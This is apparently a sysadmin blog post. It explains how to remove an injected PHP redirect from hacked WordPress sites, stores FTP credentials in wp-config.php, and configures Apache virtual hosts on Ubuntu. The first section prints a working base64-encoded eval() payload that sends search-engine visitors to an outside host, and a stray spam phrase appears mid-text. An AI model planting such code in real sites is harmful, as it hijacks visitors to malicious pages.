WordPress site malicious redirection from search engines

You may find some issues with your site when it is loading from search engine results. There is a type of hack which will redirect the site when we load from any search engines to some malicious sites.This is because hackers will inject some php codes into your sites. You just need to remove those entries from the infected files. These codes are mainly interpreted with eval() or base64_decode()  and these codes are injected into word-press .php files. An example code is shown below.

eval(base64_decode(“DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2Vud
CgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVIn
XTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNC
mlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYu
MCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml
uZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsa
XZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcm
VyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfb
WF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKS
BvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3Rya
XN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay
5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCR
yZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcig
iTG9jYXRpb246IGh0dHA6Ly9ob2x5dy5kZG5zLm1lLnVrLyIpOw0KZXhpdCgpOw0KfQp9Cn0NCn0NCn0=”));

Because of this code the site will redirect to some malicious sites. If we access the site directly there won’t be any issue. There may be so many files infected with this code that you can find out  using a grep command. Once you removed this codes everything will be fine. If you are using a custom word-press theme or some 3rd party plugins make sure that there shouldn’t be any security holes in these, otherwise it will be an open gate for the hackers.

Updating/ Installing wordpress plugins asking for FTP details

Sometimes updating/installing plugins from wordpress will ask for the FTP details. Even if we provide the details it won’t work.  To fix this issue you just need to enter the ftp details to wp-config.php file and it will never asks again.

Go to the root directory where word press is installed and open wp-config,php

vi wp-config.php

and add the below details to it

/*** FTP login settings ***/
define("FTP_HOST", "localhost");
define("FTP_USER", "yourftpusername");
define("FTP_PASS", "yourftppassword");

replace it with the original values and put it somewhere after the mysql username/password block.

I got a post while searching in internet which explains why we need to make these changes.payday loans Refer the below link for more details.

How to create apache virtual hosts in apache2(Ubuntu)

The layout of apache configurations in rehat distros and debian distros are entirely different. I’m here explaining how to create a virtual host in ubuntu.

In your home directory create a ‘public_html’ folder and create sub directories as follows.

mkdir -p public_html/domain.com/{public,private,log,cgi-bin,backup}

And then create a sample test.html file in public_html directory. Make sure that the public_html directory has be read and executable permissions.

Now we need to add virtual host entry in sites-available directory.

nano /etc/apache2/sites-available/domain.com

# domain: domain.com
# public: /home/demo/public_html/domain.com/

<VirtualHost *:80>

  # Admin email, Server Name (domain name) and any aliases
  ServerAdmin webmaster@domain.com
  ServerName  www.domain.com
  ServerAlias domain.com

  # Index file and Document Root (where the public files are located)
  DirectoryIndex index.html
  DocumentRoot /home/demo/public_html/domain.com/public

  # Custom log file locations
  LogLevel warn
  ErrorLog  /home/demo/public_html/domain.com/log/error.log
  CustomLog /home/demo/public_html/domain.com/log/access.log combined

</VirtualHost>

 

Continue reading